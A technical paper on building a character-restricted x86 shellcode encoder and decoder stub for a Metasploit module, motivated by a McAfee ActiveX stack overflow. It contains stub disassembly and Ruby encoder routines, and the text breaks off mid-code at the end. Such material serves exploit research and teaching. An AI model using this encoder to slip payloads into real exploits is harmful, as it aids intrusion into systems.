Implementing a Custom X86 Encoder
Aug, 2006
skape
mmiller@hick.org


1) Foreword

Abstract: This paper describes the process of implementing a custom
encoder for the x86 architecture. To help set the stage, the McAfee
Subscription Manager ActiveX control vulnerability, which was discovered
by eEye, will be used as an example of a vulnerability that requires the
implementation of a custom encoder. In particular, this vulnerability
does not permit the use of uppercase characters. To help make things
more interesting, the encoder described in this paper will also avoid
all characters above 0x7f. This will make the encoder both UTF-8 safe
and tolower safe.

Challenge: The author believes that a UTF-8 safe and tolower safe
encoder could most likely be implemented in a much more optimized
fashion that incurs far less overhead in terms of size. If any reader
has ideas about ways in which this might be approached, feel free to
contact the author. A bonus challenge would be to identify a geteip
technique that can be used with these character limitations.

2) Introduction

In the month of August, eEye released an advisory for a stack-based
buffer overflow that was found in the McAfee Subscription Manager
ActiveX control. The underlying vulnerability was in an insecure call
to vsprintf that was exposed through scripting-accessible routines. At a
glance, this vulnerability would appear trivial to exploit given that
it's a very basic stack overflow. However, once it comes to
transmitting a payload, or even a particular return address, certain
limiting factors begin to appear. This paper centers on an exercise in
implementing a custom encoder to overcome certain character set
limitations. The McAfee Subscription Manager vulnerability will be used
as a real-world example of a vulnerability that requires a custom
encoder to exploit.

When it comes to exploiting this vulnerability, the first step is to
reproduce the conditions reported in the advisory. As with most
vulnerabilities, it's customary to send an arbitrary sequence of bytes,
such as A's. However, in this particular case, sending a sequence of
A's, each of which is 0x41, actually causes the return address to be
overwritten with 0x61's, which are lowercase a's. Judging from this, it
seems clear that the input string is undergoing a tolower operation and
that it will not be possible for the payload or return address to
contain any uppercase characters.

Given these character restrictions, it's safe to go forward with writing
the exploit. To simply get a proof of concept for code execution, it
makes sense to put a series of int3's, represented by the 0xcc opcode,
immediately following the return address. The return address could then
be pointed to the location of a push esp / ret or some other type of
instruction sequence that transfers control to where the series of
int3's should reside. Once the vulnerability is triggered, the debugger
should break in at an int3 instruction, but that's not actually what
happens. Instead, it breaks in on a completely different instruction:

    (4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!)
    eax=00000f19 ebx=00000000 ecx=00139438
    edx=0013a384 esi=00001b58 edi=0013a080
    eip=0013a02c esp=0013a02c ebp=36213365 iopl=0
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
    0013a02c ec in al,dx
    0:000> u eip
    0013a02c ec in al,dx
    0013a02d ec in al,dx
    0013a02e ec in al,dx
    0013a02f ec in al,dx

Again, it looks like the buffer is undergoing some sort of transformation. One
quick thing to notice is that 0xcc + 0x20 = 0xec. This is similar to what
happens when changing an uppercase character to a lowercase character, such as
where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20. It appears
that the operation that's performing the case lowering may also be
inadvertently performing it on a specific high ASCII range.

What's actually occurring is that the subscription manager control is calling
_mbslwr, using the statically linked CRT, on a copy of the original input
string. Internally, _mbslwr calls into __crtLCMapStringA. Eventually this will
lead to a call out to kernel32!LCMapStringW. The second parameter to this
routine is dwMapFlags, which describes what sort of transformations, if any,
should be performed on the buffer. The _mbslwr routine passes 0x100, or
LCMAP_LOWERCASE. This is what results in the lowering of the string.

So, given this information, it can be determined that it will not be possible
to use the characters from 0x41 through 0x5A inclusive or, for the sake of
clarity, the characters from 0xc0 through 0xe0. In actuality, not all of the
characters in the latter range are bad. The main reason this ends up causing
problems is because many of the payload encoders out there for x86, including
those in Metasploit, rely on characters from these two sets for their decoder
stub and subsequent encoded data. For that reason, and for the challenge, it's
worth pursuing the implementation of a custom encoder.

While this particular vulnerability will permit the use of many characters
above 0x80, it makes the challenge that much more interesting, and particularly
useful, to limit the usable character set to the characters described below.
The reason this range is more useful is because the characters are UTF-8 safe
and also tolower safe. Like most good payloads, the encoder will also avoid
NULL bytes.

    0x01 -> 0x40
    0x5B -> 0x7f

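The usable character set listed above can be expressed as a small predicate.
The following Ruby sketch is illustrative only; the names VALID_BYTES,
valid_byte?, and valid_string? are hypothetical and are not part of the
encoder module described later in this paper.

```ruby
# Hypothetical helpers: the two ranges below are the usable character set
# from the text (0x01-0x40 and 0x5b-0x7f).
VALID_BYTES = ((0x01..0x40).to_a + (0x5b..0x7f).to_a).freeze

# True when a single byte value is inside the usable character set.
def valid_byte?(b)
  VALID_BYTES.include?(b)
end

# True when every byte of a string is inside the usable character set.
def valid_string?(s)
  s.each_byte.all? { |b| valid_byte?(b) }
end

puts VALID_BYTES.length               # number of usable byte values
puts valid_string?("\x6a\x04".b)      # push byte 0x4 passes
puts valid_string?("ABC".b)           # uppercase characters are rejected
puts valid_string?("\xcc".b)          # int3 is rejected as well
```

A check like this is handy when hand-assembling stub instructions, since a
single byte outside the set is enough to corrupt the payload.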
As with all encoded formats, there are actually two major pieces involved. The
first part is the encoder itself. The encoder is responsible for taking a raw
buffer and encoding it into the appropriate format. The second part is the
decoder, which, as is probably obvious, takes the encoded form and converts it
back into the raw form so that it can be executed as a payload. The
implementation of these two pieces will be described in the following chapters.


3) Implementing the Decoder

The implementation of the decoder involves taking the encoded form and
converting it back into the raw form. This must all be done using assembly
instructions that will execute natively on the target machine after an exploit
has succeeded, and it must use only those instructions whose encodings fall
within the valid character set. To accomplish this, it makes sense to figure
out what instructions are available out of the valid character set. To do that,
it's as simple as generating all of the permutations of the valid characters in
both the first and second byte positions. This provides a pretty good idea of
what's available. The end result of such a process is a list of about 105
unique instructions (independent of operand types). Of those instructions the
most interesting are listed below:

    add
    sub
    imul
    inc
    cmp
    jcc
    pusha
    push
    pop
    and
    or
    xor

Some very useful instructions are available, such as add, xor, push, pop, and a
few jcc's. While there's an obvious lack of the traditional mov instruction,
it can be made up for through a series of push and pop instructions, if needed.
With the set of valid instructions identified, it's possible to begin
implementing the decoder. Most decoders will involve three implementation
phases. The first phase is used to determine the base address of the decoder
stub using a geteip technique. Following that, the encoded data must be
transformed from its character-safe form to the form that it will actually
execute from. Finally, the decoder must transfer control into the decoded data
so that the actual payload can begin executing. These three steps will be
described in the following sections.

In order to better understand the following sections, it's important to
describe the general approach that is going to be taken to implement the
decoder. The stub header is used to prepare the necessary state for the decode
transforms. The transforms themselves take the encoded data, as a series of
four byte blocks, and translate it using the process described in section 3.2.
Finally, execution falls through to the decoded data that is stored in place of
the encoded data.

3.1) Determining the Stub's Base Address

The first step in most decoder stubs will require the use of a series of
instructions, also referred to as geteip code, that obtain the location of the
current instruction pointer. The reason this is necessary is because most
decoders will have the encoded data placed immediately following the decoder
stub in memory. In order to operate on the encoded data using an absolute
address, it is necessary to determine where the data is. If the decoder stub
can determine the address that it's executing from, then it can determine the
address of the encoded data immediately following it in memory in a
position-independent fashion. As one might expect, the character limitations of
this challenge make it quite a bit harder to get the value of the current
instruction pointer.

There are a number of different techniques that can be used to get the value of
the instruction pointer on x86. However, the majority of these techniques rely
on the use of the call instruction. The problem with the use of the call
instruction is that it is generally composed of a high ASCII byte, such as 0xe8
or 0xff. Another technique that can be used to get the instruction pointer is
the fnstenv FPU instruction. Unfortunately, this instruction is also composed
of bytes in the high ASCII range, such as 0xd9. Yet another approach is to use
structured exception handling to get the instruction pointer. This is
accomplished by registering an exception handler and extracting the Eip value
from the CONTEXT structure when an exception is generated. In fact, this
approach has even been implemented in entirely alphanumeric form for Windows by
SkyLined. Unfortunately, it can't be used in this case because it relies on
uppercase characters.

With all of the known geteip techniques unusable, it seems like some
alternative method for getting the base address of the decoder stub will be
needed. In the world of alphanumeric encoders, such as SkyLined's Alpha2, it
is common for the decoder stub to assume that a certain register contains the
base address of the decoder stub. This assumption makes the decoder more
complicated to use because it can't simply be dropped into any exploit and be
expected to work. Instead, exploits may need to be modified in order to ensure
that a register can be found that contains the location of, or some location
near, the decoder stub.

At the time of this writing, the author is not aware of a geteip technique that
can be used that is both 7-bit safe and tolower safe. Like the alphanumeric
payloads, the decoder described in this paper will be implemented using a
register that is explicitly assumed to contain a reference to some address that
is near the base address of the decoder stub. For this document, the register
that is assumed to hold the address will be ecx, but it is equally possible to
use other registers.

For this particular decoder, determining the base address is just the first
step involved in implementing the stub's header. Once the base address has
been determined, the decoder must adjust the register that holds the base
address to point to the location of the encoded data. The reason this is
necessary is because the next step of the decoder, the transforms, depends on
knowing the location of the encoded data that they will be operating on. In
order to calculate this address, the decoder must add the size of the stub
header plus the size of all of the decode transforms to the register that
holds the base address. The end result should be that the register will hold
the address of the first encoded block.

The following disassembly shows one way that the stub header might be
implemented. In this disassembly, ecx is assumed to point at the beginning of
the stub header:

    00000000  6A12              push byte +0x12
    00000002  6B3C240B          imul edi,[esp],byte +0xb
    00000006  60                pusha
    00000007  030C24            add ecx,[esp]
    0000000A  6A19              push byte +0x19
    0000000C  030C24            add ecx,[esp]
    0000000F  6A04              push byte +0x4

The purpose of the first two instructions is to calculate the number of bytes
consumed by all of the decode transforms (which are described in section 3.2).
They accomplish this by multiplying the size of each transform, which is 0xb
bytes, by the total number of transforms, which in this example is 0x12. The
result of the multiplication, 0xc6, is stored in edi. Since the transform count
is pushed as a single byte that must itself be a valid character, it can be at
most 0x7f. With each transform decoding four bytes of the raw payload, the
maximum number of bytes that can be encoded is therefore 0x7f * 4, or 508
bytes. This shouldn't be seen as much of a limiting factor, though, as other
combinations of imul can be used to account for larger payloads.

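The arithmetic performed by the first two instructions can be checked with a
few lines of Ruby. This is only a sketch: the constant and method names are
made up for illustration, and the 0x7f ceiling assumes the count is pushed
with a single push byte instruction, as in the header shown above.

```ruby
# Values taken from the text; the names themselves are hypothetical.
TRANSFORM_SIZE = 0x0b   # bytes occupied by one decode transform
BLOCK_SIZE     = 4      # raw payload bytes decoded by one transform
MAX_PUSH_BYTE  = 0x7f   # largest count that is still a valid character

# Number of bytes consumed by `count` decode transforms (the imul result).
def transforms_size(count)
  count * TRANSFORM_SIZE
end

# Largest raw payload that a single push byte count can describe.
def max_payload_bytes
  MAX_PUSH_BYTE * BLOCK_SIZE
end

printf("0x%x\n", transforms_size(0x12))   # matches the 0xc6 from the text
puts max_payload_bytes                    # matches the 508 from the text
```

One thing the sketch does not model is that a count between 0x41 and 0x5a
would itself be a bad character, so payloads needing such a count would have
to be padded or described with a different imul combination.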
Once the size of the decode transforms has been calculated, pusha is executed
in order to place the edi register at the top of the stack (pusha pushes edi
last). With the value of edi at the top of the stack, the value can be added to
the base address register ecx, thus accounting for the number of bytes used by
the decode transforms. The astute reader might ask why the value of edi is
indirectly added to ecx. Why not just add it directly? The answer, of course,
is due to bad characters. The direct form contains 0xf9, which is above 0x7f:

    00000000  01F9              add ecx,edi

It's also not possible to simply push edi onto the stack, because the push edi
instruction is itself a bad character (0x57 is an uppercase 'W'):

    00000000  57                push edi

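The reasoning above can be double-checked mechanically by testing each
candidate encoding against the valid character set. The Ruby sketch below is
an illustration only; VALID and bad_bytes are hypothetical names, and the
byte strings are the encodings shown in the disassembly listings in this
section.

```ruby
# Usable character set from the introduction (0x01-0x40 and 0x5b-0x7f).
VALID = ((0x01..0x40).to_a + (0x5b..0x7f).to_a).freeze

# Returns the bytes of an instruction encoding that fall outside the set.
def bad_bytes(encoding)
  encoding.bytes.reject { |b| VALID.include?(b) }
end

candidates = {
  'add ecx,edi'   => "\x01\xf9".b,      # direct add, rejected
  'push edi'      => "\x57".b,          # direct push, rejected
  'pusha'         => "\x60".b,          # used by the stub header
  'add ecx,[esp]' => "\x03\x0c\x24".b   # used by the stub header
}

candidates.each do |name, encoding|
  bad = bad_bytes(encoding)
  status = bad.empty? ? 'ok' : 'bad: ' + bad.map { |b| format('0x%02x', b) }.join(' ')
  puts "#{name.ljust(14)} #{status}"
end
```

The same helper can be pointed at any other instruction encoding that is
being considered for the stub.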
Starting with the fifth instruction, the size of the stub header, plus any
other offsets that may need to be accounted for, is added to the base address
in order to shift the ecx register to point at the start of the encoded data.
This is accomplished by simply pushing the number of bytes to add onto the
stack and then adding them to the ecx register indirectly by adding through
[esp].

After these instructions are finished, ecx will point to the start of the
encoded data. The final instruction in the stub header is a push byte 0x4. This
instruction isn't actually used by the stub header, but it's there to set up
some necessary state that will be used by the decode transforms. Its use will
be described in the next section.

3.2) Transforming the Encoded Data

The most important part of any decoder is the way in which it transforms the
data from its encoded form to its actual form. For example, many of the
decoders used in the Metasploit Framework and elsewhere will xor a portion of
the encoded data with a key that results in the actual bytes of the original
payload being produced. While this is an effective way of obtaining the desired
results, it's not possible to use such a technique with the character set
limitations currently defined in this paper.

In order to transform encoded data back to its original form, it must be
possible to produce any byte from 0x00 to 0xff using any number of combinations
of bytes that fall within the valid character set. This means that this
decoder will be limited to using combinations of characters that fall within
0x01-0x40 and 0x5b-0x7f. To figure out the best possible means of
accomplishing the transformation, it makes sense to investigate each of the
useful instructions that were identified earlier in this chapter.

The bitwise instructions, such as and, or, and xor, are not going to be
particularly useful to this decoder. The main reason for this is that they are
unable to produce values at or above 0x80 without the aid of a bit shifting
instruction. Every valid character has its high bit clear, so no combination
of and, or, and xor applied to valid characters can ever set it. While these
instructions can produce 0x00, for example by xoring a character with itself,
everything else they produce remains below the 0x80 boundary. These
restrictions make the bitwise instructions unusable.

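The limitation of the bitwise instructions can be confirmed by brute force.
The following Ruby sketch, which uses hypothetical names throughout, applies
and, or, and xor to every pair of valid characters and records the values
that come out.

```ruby
# Usable character set from the introduction (0x01-0x40 and 0x5b-0x7f).
VALID = ((0x01..0x40).to_a + (0x5b..0x7f).to_a).freeze

# reach[op] collects every value that op can produce from two valid bytes.
reach = { and: {}, or: {}, xor: {} }

VALID.each do |a|
  VALID.each do |b|
    reach[:and][a & b] = true
    reach[:or][a | b]  = true
    reach[:xor][a ^ b] = true
  end
end

reach.each do |op, seen|
  # The largest reachable value never crosses the 0x80 boundary.
  puts format('%-3s largest result: 0x%02x', op, seen.keys.max)
end
```

Because the high bit is clear in every input, it stays clear in every
output, which is why half of all byte values are out of reach for these
instructions.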
The imul instruction could be useful in that it is possible to multiply two
characters from the valid character set together to produce values that reside
outside of the valid character set. For example, multiplying 0x02 by 0x7f
produces 0xfe. While this may have its uses, there are two remaining
instructions that are actually the most useful.

The add instruction can be used to produce almost all possible characters.
However, it's unable to produce a few specific values. For example, it's
impossible to add two valid characters together to produce 0x00. It is also
impossible to add two valid characters together to produce 0xff or 0x01.
While this limitation may make it appear that the add instruction is unusable,
its saving grace is the sub instruction.

Like the add instruction, the sub instruction is capable of producing almost
all possible characters. It is certainly capable of producing the values that
add cannot. For example, it can produce 0x00 by subtracting 0x02 from 0x02.
It can also produce 0xff by subtracting 0x03 from 0x02. Finally, 0x01 can be
produced by subtracting 0x02 from 0x03. However, like the add instruction,
there are also characters that the sub instruction cannot produce. These
characters are 0x7f, 0x80, and 0x81.

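The gaps left by add and sub can be enumerated directly. The Ruby sketch
below is an illustration with hypothetical names; it tries every pair of
valid characters and reports the byte values that each operation can never
produce.

```ruby
# Usable character set from the introduction (0x01-0x40 and 0x5b-0x7f).
VALID = ((0x01..0x40).to_a + (0x5b..0x7f).to_a).freeze

# Yields every pair of valid bytes to the block and returns the byte values
# (0x00-0xff) that the block's operation never produces.
def unreachable
  seen = {}
  VALID.each do |a|
    VALID.each { |b| seen[yield(a, b) & 0xff] = true }
  end
  (0x00..0xff).reject { |v| seen[v] }
end

add_missing = unreachable { |a, b| a + b }
sub_missing = unreachable { |a, b| a - b }

puts 'add cannot produce: ' + add_missing.map { |v| format('0x%02x', v) }.join(', ')
puts 'sub cannot produce: ' + sub_missing.map { |v| format('0x%02x', v) }.join(', ')
```

The two lists do not overlap, which is what makes the pairing of add and sub
attractive: any single byte can be produced by at least one of them.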
Given this analysis, it seems that using add and sub in combination is most
likely going to be the best choice when it comes to transforming encoded data
for this decoder. With the fundamental operations selected, the next step is
to attempt to implement the code that actually performs the transformation. In
most decoders, the transform will be accomplished through a loop that simply
performs the same operation on a pointer that is incremented by a set number of
bytes each iteration. This type of approach results in all of the encoded data
being decoded prior to executing it. Using this type of technique is a little
bit more complicated for this decoder, though, because it can't simply rely on
the use of a static key and it's also limited in terms of what instructions it
can use within the loop.

For these reasons, the author decided to go with an alternative technique for
the transformation portion of the decoder stub. Rather than using a loop that
iterates over the encoded data, the author chose to use a series of sequential
transformations, one for each block of the encoded data. This technique has
been used before in similar situations. One negative aspect of using this
approach over a loop-based approach is that it substantially increases the size
of the encoded payload. While this description gives an idea of the structure
of the decoder, it doesn't give a concrete understanding of how it's actually
implemented. It's at this point that one must descend from the lofty
high-level. What better way to do this than diving right into the disassembly?

    00000011  6830703C14        push dword 0x143c7030
    00000016  5F                pop edi
    00000017  0139              add [ecx],edi
    00000019  030C24            add ecx,[esp]

The form of each transform will look exactly like this one. What's actually
occurring is that a four byte value is pushed onto the stack and then popped
into the edi register. This is done in place of a mov instruction because the
mov instruction contains invalid characters. Once the value is in the edi
register, it is either added to or subtracted from its respective encoded data
block. The result of the add or subtract is stored in place of the previously
encoded data. Once the transform has completed, it adds the value at the top
of the stack, which was set to 0x4 in the decoder stub header, to the register
that holds the pointer into the encoded data. This results in the pointer
moving on to the next encoded data block so that the subsequent transform will
operate on the correct block.

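The effect of a single transform can be modeled outside of a debugger. The
Ruby sketch below is a simplified model, not the decoder itself: the method
name apply_transform and the sample byte values are hypothetical, chosen so
that both the immediate and the encoded block stay inside the valid
character set.

```ruby
# Hypothetical model of one decode transform. `encoded` is the four byte
# block at [ecx]; `key` is the immediate that the transform pops into edi.
def apply_transform(encoded, key, op)
  block = encoded.unpack1('V')     # little-endian dword stored at [ecx]
  edi   = key.unpack1('V')         # value loaded through push / pop edi
  value = op == :add ? block + edi : block - edi
  [value & 0xffffffff].pack('V')   # wrap to 32 bits, as the CPU would
end

# add [ecx],edi: 0x40+0x02, 0x10+0x10, 0x40+0x40, 0x3c+0x3c
decoded = apply_transform("\x40\x10\x40\x3c".b, "\x02\x10\x40\x3c".b, :add)
puts decoded.unpack1('H*')         # => 42208078

# sub [ecx],edi: a block of NULL bytes, which add could not produce
zeroes = apply_transform("\x02\x02\x02\x02".b, "\x02\x02\x02\x02".b, :sub)
puts zeroes.unpack1('H*')          # => 00000000
```

Note that the operation is a full 32-bit add or subtract, so carries and
borrows can move between bytes; the add example above was picked so that no
byte overflows.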
This simple process is all that's necessary to perform the transformations
using only valid characters. As mentioned above, one of the negative aspects
of this approach is that it does add quite a bit of overhead to the original
payload. For each four byte block, 11 bytes of overhead are added. The
approach is also limited by the fact that if a single four byte block of the
raw payload contains both a character that add cannot handle, such as 0x00, and
a character that sub cannot handle, such as 0x80, then it will not be possible
to encode it.

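The size overhead can be estimated ahead of time. The Ruby sketch below uses
hypothetical names and assumes the layout described in this chapter: a 0x11
byte stub header, one 11 byte transform per four byte block, and the encoded
blocks themselves. It reproduces the final size of 47 bytes that msfencode
reports for an eight byte payload in the example near the end of this paper.

```ruby
# Sizes taken from the text and the disassembly; names are hypothetical.
STUB_HEADER_SIZE = 0x11   # the first transform starts at offset 0x11
TRANSFORM_SIZE   = 11     # bytes of decoder code per block
BLOCK_SIZE       = 4      # bytes of payload per block

# Total encoded size for a raw payload of raw_len bytes.
def encoded_size(raw_len)
  blocks = (raw_len + BLOCK_SIZE - 1) / BLOCK_SIZE   # round up to blocks
  STUB_HEADER_SIZE + blocks * (TRANSFORM_SIZE + BLOCK_SIZE)
end

puts encoded_size(8)     # two blocks
puts encoded_size(508)   # largest payload for a single push byte count
```

In other words, the encoded form is a little under four times the size of
the raw payload once the fixed header is amortized.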
3.3) Transferring Control to the Decoded Data

Due to the way the decoder is structured, there is no need for it to include
code that directly transfers control to the decoded data. Since this decoder
does not use any sort of looping, execution control will simply fall through to
the decoded data after all of the transformations have completed.


4) Implementing the Encoder

The encoder portion is made up of code that runs on an attacker's machine prior
to exploiting a target. It converts the actual payload that will be executed
into the encoded format and then transmits the encoded form as the payload.
Once the target begins executing code, the decoder, as described in chapter 3,
converts the encoded payload back into its raw form and then executes it.

For the purposes of this document, the client-side encoder was implemented in
the 3.0 version of the Metasploit Framework as an encoder module for x86. This
chapter will describe what was actually involved in implementing the encoder
module for the Metasploit Framework.

The very first step involved in implementing the encoder is to create the
appropriate file and set up the class so that it can be loaded into the
framework. This is accomplished by placing the encoder module's file in the
appropriate directory, which in this case is modules/encoders/x86. The name of
the module's file is important only in that the module's reference name is
derived from the filename. For example, this encoder can be referenced as
x86/avoid_utf8_tolower based on its filename. In this case, the module's
filename is avoid_utf8_tolower.rb. Once the file is created in the appropriate
location, the next step is to define the class and provide the framework with
the appropriate module information.

To define the class, it must be placed in the appropriate namespace that
reflects where it resides on the filesystem. In this case, the module is placed
in the Msf::Encoders::X86 namespace. The name of the class itself is not
important so long as it is unique within the namespace. When defining the
class, it is important that it inherit from the Msf::Encoder base class at some
level. This ensures that it implements all the required methods for an encoder
to function when the framework is interacting with it.

At this point, the class definition should look something like this:

    require 'msf/core'

    module Msf
    module Encoders
    module X86

    class AvoidUtf8 < Msf::Encoder

    end

    end
    end
    end

With the class defined, the next step is to create a constructor and to pass
the appropriate module information down to the base class in the form of the
info hash. This hash contains information about the module, such as name,
version, authorship, and so on. For encoder modules, it also conveys
information about the type of encoder that's being implemented as well as
information specific to the encoder, like block size and key size. For this
module, the constructor might look something like this:

    def initialize
      super(
        'Name'        => 'Avoid UTF8/tolower',
        'Version'     => '$Revision: 1.3 $',
        'Description' => 'UTF8 Safe, tolower Safe Encoder',
        'Author'      => 'skape',
        'Arch'        => ARCH_X86,
        'License'     => MSF_LICENSE,
        'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe,
        'Decoder'     =>
          {
            'KeySize'   => 4,
            'BlockSize' => 4,
          })
    end

With all of the boilerplate code out of the way, it's time to finally get into
implementing the actual encoder. When implementing encoder modules in the 3.0
version of the Metasploit Framework, there are a few key methods that can be
overridden by a derived class. These methods are described in detail in the
developer's guide, so an abbreviated explanation of only those useful to this
encoder will be given here. Each method will be explained in its own
individual section.

4.1) decoder_stub

First and foremost, the decoder_stub method gives an encoder module the
opportunity to dynamically generate a decoder stub. The framework's idea of
the decoder stub is equivalent to the stub header described in chapter 3. In
this case, it must simply provide a buffer whose assembly will set up a
specific register to point to the start of the encoded data blocks as described
in section 3.1. The completed version of this method might look something like
this:

    def decoder_stub(state)
      # number of four byte blocks, and thus the number of transforms
      len = ((state.buf.length + 3) & (~0x3)) / 4

      # optional extra distance between ecx and the start of the stub
      off = (datastore['BufferOffset'] || 0).to_i

      decoder =
        "\x6a" + [len].pack('C')      + # push len
        "\x6b\x3c\x24\x0b"            + # imul edi, [esp], 0xb
        "\x60"                        + # pusha
        "\x03\x0c\x24"                + # add ecx, [esp]
        "\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off
        "\x03\x0c\x24"                + # add ecx, [esp]
        "\x6a\x04"                      # push byte 0x4

      # the encoded data blocks are accumulated here by encode_block
      state.context = ''

      return decoder
    end

In this routine, the length of the raw buffer, as found through
state.buf.length, is aligned up to a four byte boundary and then divided by
four, which yields the number of four byte blocks and therefore the number of
decode transforms. Following that, an optional buffer offset is stored in the
off local variable. The purpose of the BufferOffset optional value is to allow
exploits to cause the encoder to account for extra size overhead in the ecx
register when doing its calculations. The decoder stub is then generated using
the calculated length and offset to produce the stub header. The stub header is
then returned to the caller.

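The alignment expression used by decoder_stub can be exercised in isolation.
The following Ruby sketch wraps the same expression in a hypothetical
transform_count method so that its behavior for a few payload lengths is
easy to see.

```ruby
# Same expression as in decoder_stub: round the length up to a multiple of
# four, then divide by four to get the number of four byte blocks.
# The method name is hypothetical.
def transform_count(raw_len)
  ((raw_len + 3) & (~0x3)) / 4
end

[1, 4, 5, 8, 72].each do |len|
  puts format('%3d bytes -> %2d transforms', len, transform_count(len))
end
```

A 72 byte payload, for instance, needs 0x12 transforms, which is the count
pushed by the stub header shown in section 3.1.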
4.2) encode_block

The next important method to override is the encode_block method. This method
is used by the framework to allow an encoder to encode a single block and
return the resultant encoded buffer. The size of each block is provided to the
framework through the encoder's information hash. For this particular encoder,
the block size is four bytes. The implementation of the encode_block routine is
as simple as trying to encode the block using either the add instruction or the
sub instruction. Which instruction is used will depend on the bytes in the
block that is being encoded.

    def encode_block(state, block)
      buf = try_add(state, block)

      if (buf.nil?)
        buf = try_sub(state, block)
      end

      if (buf.nil?)
        raise BadcharError.new(state.encoded, 0, 0, 0)
      end

      buf
    end

The first thing encode_block tries is add. The try_add method is implemented as
shown below:

    def try_add(state, block)
      buf  = "\x68"   # push dword imm32
      vbuf = ''       # immediate bytes (the value popped into edi)
      ctx  = ''       # encoded data bytes for this block

      block.each_byte { |b|
        # add cannot produce these values from two valid characters
        return nil if (b == 0xff or b == 0x01 or b == 0x00)

        # pick a random split of b into two valid characters
        begin
          xv = rand(b - 1) + 1
        end while (is_badchar(state, xv) or is_badchar(state, b - xv))

        vbuf += [xv].pack('C')
        ctx  += [b - xv].pack('C')
      }

      # pop edi / add [ecx], edi / add ecx, [esp]
      buf += vbuf + "\x5f\x01\x39\x03\x0c\x24"

      state.context += ctx

      return buf
    end

The try_add routine enumerates each byte in the block, trying to find a random
byte that, when added to another random byte, produces the byte value in the
block. The algorithm it uses to accomplish this is to loop, selecting a random
value between 1 and one less than the actual value. From there a check is made
to ensure that both the random value and the remainder are within the valid
character set. If they are both valid, then one of the values is stored as one
of the bytes of the 32-bit immediate operand to the push instruction that is
part of the decode transform for the current block. The second value is
appended to the encoded block context. After all bytes have been considered,
the instructions that compose the decode transform are completed and the
encoded block context is appended to the string of encoded blocks. Finally, the
decode transform is returned to the framework.

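To see which splits try_add can choose from, the random search can be
replaced with an exhaustive one. The Ruby sketch below is a deterministic
variation written for illustration, not the module's code; add_pairs and
VALID are hypothetical names, and the fixed character set stands in for the
framework's is_badchar check.

```ruby
# Usable character set from the introduction (0x01-0x40 and 0x5b-0x7f).
VALID = ((0x01..0x40).to_a + (0x5b..0x7f).to_a).freeze

# Returns every [immediate_byte, encoded_byte] pair of valid characters
# whose sum is b. An empty list means add cannot encode this byte.
def add_pairs(b)
  VALID.select { |x| VALID.include?(b - x) }.map { |x| [x, b - x] }
end

[0x00, 0x01, 0x42, 0xcc, 0xfe, 0xff].each do |b|
  puts format('0x%02x: %d possible splits', b, add_pairs(b).length)
end
```

Bytes with an empty list are exactly the ones for which try_add returns nil,
while a byte such as 0xfe has only a single valid split (0x7f + 0x7f), which
the random loop may need many iterations to find.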
In the event that any of the bytes that compose the block being encoded by
|
|
try_add are 0x00, 0x01, or 0xff, the routine will return nil. When this
|
|
happens, the encode_block routine will attempt to encode the block using the sub
|
|
instruction. The implementation of the try_sub routine is shown below:
|
|
|
|
|
|
def try_sub(state, block)
|
|
buf = "\x68";
|
|
vbuf = ''
|
|
ctx = ''
|
|
carry = 0
|
|
|
|
block.each_byte { |b|
|
|
return nil if (b == 0x80 or b == 0x81 or b == 0x7f)
|
|
|
|
x = 0
|
|
y = 0
|
|
prev_carry = carry
|
|
|
|
begin
|
|
carry = prev_carry
|
|
|
|
if (b > 0x80)
|
|
diff = 0x100 - b
|
|
y = rand(0x80 - diff - 1).to_i + 1
|
|
x = (0x100 - (b - y + carry))
|
|
carry = 1
|
|
else
|
|
diff = 0x7f - b
|
|
x = rand(diff - 1) + 1
|
|
y = (b + x + carry) & 0xff
|
|
carry = 0
|
|
end
|
|
|
|
end while (is_badchar(state, x) or is_badchar(state, y))
|
|
|
|
vbuf += [x].pack('C')
|
|
ctx += [y].pack('C')
|
|
}
|
|
|
|
buf += vbuf + "\x5f\x29\x39\x03\x0c\x24"
|
|
|
|
state.context += ctx
|
|
|
|
return buf
|
|
end
|
|
|
|
|
|
Unlike the try_add routine, the try_sub routine is a little bit more
complicated, perhaps unnecessarily. The main reason for this is that
subtracting two 32-bit values has to take into account borrowing from one
byte to the next. The basic idea is the same. Each byte in the block is
enumerated. If the byte is above 0x80, the routine calculates the difference
between 0x100 and the byte. From there, it calculates the y value as a random
number between 1 and 0x80 minus the difference minus one. Using the y value,
it generates the x value as 0x100 - (b - y + carry), where b is the byte
value and carry is the current carry flag. Because x ends up larger than y,
the subtraction borrows from the next byte, which is why the carry flag is
set to one afterwards. To better understand this, consider the following
scenario.

Say that the byte being encoded is 0x84. The difference between 0x100 and 0x84
is 0x7c. A valid value of y could be 0x3, as derived from
rand(0x80 - 0x7c - 1) + 1. Given this value for y, the value of x would be,
assuming a zero carry flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or
y, the result wraps around to 0x84 in the low byte.

However, if the byte value is less than 0x80, then a different method is used
to select the x and y values. In this case, the difference is calculated as
0x7f minus the value of the current byte. The value of x is then assigned a
random value between 1 and the difference minus one. The value of y is then
calculated as the current byte plus x plus the carry flag. For example, if the
value is 0x24, then the values could be calculated as described in the
following scenario.

First, the difference between 0x7f and 0x24 is 0x5b. The value of x could be
0x18, as derived from rand(0x5b - 1) + 1. From there, assuming a zero carry
flag, the value of y would be calculated as 0x3c through 0x24 + 0x18.
Therefore, 0x3c - 0x18 is 0x24.
|
|
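The two scenarios above can be checked mechanically. What follows is only a
minimal sketch and is not part of the encoder; the helper name decode_byte is
hypothetical and simply models one byte lane of the sub instruction, that is,
y minus x minus any incoming borrow, truncated to eight bits.

```ruby
# Hypothetical helper: models one byte lane of `sub [ecx], edi`.
# y is the byte stored in the data block, x is the byte pushed by the
# decoder, and borrow_in is the borrow from the previous (lower) byte.
def decode_byte(y, x, borrow_in = 0)
  (y - x - borrow_in) & 0xff
end

# High-byte scenario from the text: b = 0x84 and y = 0x03.
b = 0x84
y = 0x03
x = 0x100 - (b - y + 0)        # same formula as try_sub, carry = 0
high = decode_byte(y, x)

# Low-byte scenario from the text: b = 0x24 and x = 0x18.
b2 = 0x24
x2 = 0x18
y2 = (b2 + x2 + 0) & 0xff      # same formula as try_sub, carry = 0
low = decode_byte(y2, x2)

printf("x=0x%02x y=0x%02x -> 0x%02x\n", x, y, high)    # x=0x7f y=0x03 -> 0x84
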